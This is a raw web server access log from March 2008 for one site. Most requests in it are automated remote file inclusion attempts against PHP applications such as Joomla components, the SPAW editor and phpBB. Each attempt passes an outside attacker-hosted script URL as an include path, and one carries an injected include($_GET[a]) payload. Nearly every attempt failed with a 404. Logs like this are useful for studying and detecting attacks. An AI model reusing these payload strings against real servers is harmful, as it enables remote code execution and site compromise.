205.214.86.14 - - [17/Mar/2008:07:58:51 -0700] "GET /logs/access_080124.log/index.php?redir=http://www.punkrockslamanya.info/killweb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.7.68 - - [17/Mar/2008:08:00:30 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.jsproduction.net/camp/read/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
211.233.7.68 - - [17/Mar/2008:08:00:30 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.jsproduction.net/camp/read/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
88.198.21.196 - - [17/Mar/2008:08:03:27 -0700] "GET /logs/access_080207.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.199.248.34 - - [17/Mar/2008:08:04:07 -0700] "GET /logs/access_080201.log/settings.inc.php?include_path=http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.248.34 - - [17/Mar/2008:08:04:07 -0700] "GET /settings.inc.php?include_path=http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.248.34 - - [17/Mar/2008:08:04:08 -0700] "GET /logs/settings.inc.php?include_path=http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.202.67 - - [17/Mar/2008:08:04:17 -0700] "GET /logs/access_080215.log/saveserver.php?thisdir=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.202.67 - - [17/Mar/2008:08:04:17 -0700] "GET /saveserver.php?thisdir=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.202.67 - - [17/Mar/2008:08:04:17 -0700] "GET /logs/saveserver.php?thisdir=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.70.14.90 - - [17/Mar/2008:08:04:24 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.compassoc.com/themes/ca/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.77.182.148 - - [17/Mar/2008:08:05:18 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.77.182.148 - - [17/Mar/2008:08:05:26 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.77.182.148 - - [17/Mar/2008:08:05:27 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.97.202.67 - - [17/Mar/2008:08:06:01 -0700] "GET /logs/access_080211.log/saveserver.php?thisdir=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [17/Mar/2008:08:06:09 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bdsauctionsite.com/includes/flags/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [17/Mar/2008:08:06:09 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bdsauctionsite.com/includes/flags/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [17/Mar/2008:08:06:09 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bdsauctionsite.com/includes/flags/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.175.25 - - [17/Mar/2008:08:07:33 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.175.25 - - [17/Mar/2008:08:07:48 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.15.196.106 - - [17/Mar/2008:08:08:01 -0700] "GET /index.php?page=http://paginas.terra.com.br/lazer/xxxfatalxxx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
72.15.196.106 - - [17/Mar/2008:08:08:01 -0700] "GET /logs/index.php?page=http://paginas.terra.com.br/lazer/xxxfatalxxx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:10:42 -0700] "GET /logs/access_080122.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.214.86.14 - - [17/Mar/2008:08:11:07 -0700] "GET /logs/access_080131.log/scanhttp://www.punkrockslamanya.info/killweb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.214.86.14 - - [17/Mar/2008:08:11:08 -0700] "GET /scanhttp://www.punkrockslamanya.info/killweb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.214.86.14 - - [17/Mar/2008:08:11:08 -0700] "GET /logs/scanhttp://www.punkrockslamanya.info/killweb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.214.86.14 - - [17/Mar/2008:08:11:09 -0700] "GET /logs/access_080131.log/scanhttp://www.punkrockslamanya.info/killweb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.214.86.14 - - [17/Mar/2008:08:11:09 -0700] "GET /scanhttp://www.punkrockslamanya.info/killweb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.214.86.14 - - [17/Mar/2008:08:11:09 -0700] "GET /logs/scanhttp://www.punkrockslamanya.info/killweb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.214.86.14 - - [17/Mar/2008:08:12:16 -0700] "GET /logs/access_080211.log/scanhttp://www.punkrockslamanya.info/killweb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.214.86.14 - - [17/Mar/2008:08:12:16 -0700] "GET /logs/access_080211.log/scanhttp://www.punkrockslamanya.info/killweb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.170.96.181 - - [17/Mar/2008:08:12:44 -0700] "GET /logs/access_080124.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:12:52 -0700] "GET /logs/access_080119.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:12:52 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:12:52 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:12:53 -0700] "GET /logs/access_080124.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.9.15 - - [17/Mar/2008:08:13:50 -0700] "GET /logs/access_070705.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.14.110.31 - - [17/Mar/2008:08:14:08 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
165.138.51.197 - - [17/Mar/2008:08:14:08 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://nkdb.org//AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.138.51.197 - - [17/Mar/2008:08:14:09 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://nkdb.org//AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.138.51.197 - - [17/Mar/2008:08:14:09 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://nkdb.org//AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.111 - - [17/Mar/2008:08:14:17 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.zojoma.com/gjestebok/img/response?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
81.177.16.111 - - [17/Mar/2008:08:14:17 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.zojoma.com/gjestebok/img/response?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
165.138.51.197 - - [17/Mar/2008:08:14:19 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://revelation-divine.net/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.138.51.197 - - [17/Mar/2008:08:14:20 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://revelation-divine.net/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.138.51.197 - - [17/Mar/2008:08:14:20 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://revelation-divine.net/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.246.155.74 - - [17/Mar/2008:08:14:24 -0700] "GET //errors.php?error=http://noodlee.t35.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
63.246.155.74 - - [17/Mar/2008:08:14:24 -0700] "GET /logs//errors.php?error=http://noodlee.t35.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
202.160.181.182 - - [17/Mar/2008:08:15:12 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.dmulk.com"
80.70.113.10 - - [17/Mar/2008:08:15:23 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
189.133.159.165 - - [17/Mar/2008:08:15:25 -0700] "GET //vbgsitemap/vbgsitemap-config.php?base=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [17/Mar/2008:08:15:25 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
202.160.178.95 - - [17/Mar/2008:08:15:27 -0700] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:08:16:08 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:08:16:09 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:08:16:10 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.200.201.194 - - [17/Mar/2008:08:16:28 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [17/Mar/2008:08:16:28 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [17/Mar/2008:08:16:28 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.19.169 - - [17/Mar/2008:08:16:51 -0700] "GET /funny/?M=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:08:17:41 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:08:17:42 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:08:17:43 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:08:18:06 -0700] "GET /logs/access_080124.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:08:18:10 -0700] "GET /logs/access_080225.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.14.221.150 - - [17/Mar/2008:08:18:14 -0700] "GET /logs//ImpExData.php?systempath=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
85.14.221.150 - - [17/Mar/2008:08:18:14 -0700] "GET //ImpExData.php?systempath=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.29.87.145 - - [17/Mar/2008:08:18:22 -0700] "GET /logs/access_071214.log//skin/zero_vote/error.php?dir=http://203.71.212.3/www/modul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.145 - - [17/Mar/2008:08:18:22 -0700] "GET //skin/zero_vote/error.php?dir=http://203.71.212.3/www/modul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.145 - - [17/Mar/2008:08:18:22 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://203.71.212.3/www/modul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.145 - - [17/Mar/2008:08:18:43 -0700] "GET /logs/access_080207.log//skin/zero_vote/error.php?dir=http://203.71.212.3/www/modul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.145 - - [17/Mar/2008:08:18:44 -0700] "GET //skin/zero_vote/error.php?dir=http://203.71.212.3/www/modul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.145 - - [17/Mar/2008:08:18:44 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://203.71.212.3/www/modul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.226.171 - - [17/Mar/2008:08:18:53 -0700] "GET /logs/access_080207.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:08:20:02 -0700] "GET /logs/access_080225.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.87.145 - - [17/Mar/2008:08:20:03 -0700] "GET /logs/access_071214.log//skin/zero_vote/error.php?dir=http://203.71.212.3/www/modul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.145 - - [17/Mar/2008:08:20:04 -0700] "GET //skin/zero_vote/error.php?dir=http://203.71.212.3/www/modul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.145 - - [17/Mar/2008:08:20:04 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://203.71.212.3/www/modul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.145 - - [17/Mar/2008:08:20:07 -0700] "GET /logs/access_071214.log//skin/zero_vote/error.php?dir=http://203.71.212.3/www/modul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.145 - - [17/Mar/2008:08:20:07 -0700] "GET //skin/zero_vote/error.php?dir=http://203.71.212.3/www/modul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.145 - - [17/Mar/2008:08:20:07 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://203.71.212.3/www/modul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.170.96.181 - - [17/Mar/2008:08:21:51 -0700] "GET /logs/access_080211.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.170.96.181 - - [17/Mar/2008:08:21:52 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.233.7.68 - - [17/Mar/2008:08:22:50 -0700] "GET /logs//tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.jsproduction.net/camp/read/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
211.233.7.68 - - [17/Mar/2008:08:22:50 -0700] "GET //tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.jsproduction.net/camp/read/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.29.87.145 - - [17/Mar/2008:08:23:00 -0700] "GET /logs/access_080207.log//skin/zero_vote/error.php?dir=http://203.71.212.3/www/modul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.7.68 - - [17/Mar/2008:08:23:35 -0700] "GET /nav.php?go=http://www.jsproduction.net/camp/read/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
211.233.7.68 - - [17/Mar/2008:08:23:35 -0700] "GET /logs/nav.php?go=http://www.jsproduction.net/camp/read/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
63.246.155.74 - - [17/Mar/2008:08:24:28 -0700] "GET /logs//errors.php?error=http://noodlee.t35.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
63.246.155.74 - - [17/Mar/2008:08:24:28 -0700] "GET //errors.php?error=http://noodlee.t35.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:25:27 -0700] "GET /logs/access_080119.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:25:28 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:25:28 -0700] "GET /logs/access_080119.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:25:28 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:25:28 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:25:28 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:25:28 -0700] "GET /logs/access_080124.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:08:25:29 -0700] "GET /logs/access_080124.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.7.68 - - [17/Mar/2008:08:25:59 -0700] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.jsproduction.net/camp/read/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
211.233.7.68 - - [17/Mar/2008:08:25:59 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.jsproduction.net/camp/read/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
59.125.5.1 - - [17/Mar/2008:08:26:20 -0700] "GET /logs/access_080225.log/oneadmin/include.php?path[docroot]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [17/Mar/2008:08:26:21 -0700] "GET /oneadmin/include.php?path[docroot]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [17/Mar/2008:08:26:22 -0700] "GET /logs/oneadmin/include.php?path[docroot]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.140.222.58 - - [17/Mar/2008:08:26:28 -0700] "GET /logs/access_080122.log//errors.php?error=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.140.222.58 - - [17/Mar/2008:08:26:29 -0700] "GET //errors.php?error=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.140.222.58 - - [17/Mar/2008:08:26:29 -0700] "GET /logs//errors.php?error=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.200.201.194 - - [17/Mar/2008:08:28:48 -0700] "GET /logs/access_080228.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.43.77.58 - - [17/Mar/2008:08:29:14 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dfmuses.xpg.com.br/uses/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
200.43.77.58 - - [17/Mar/2008:08:29:15 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dfmuses.xpg.com.br/uses/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
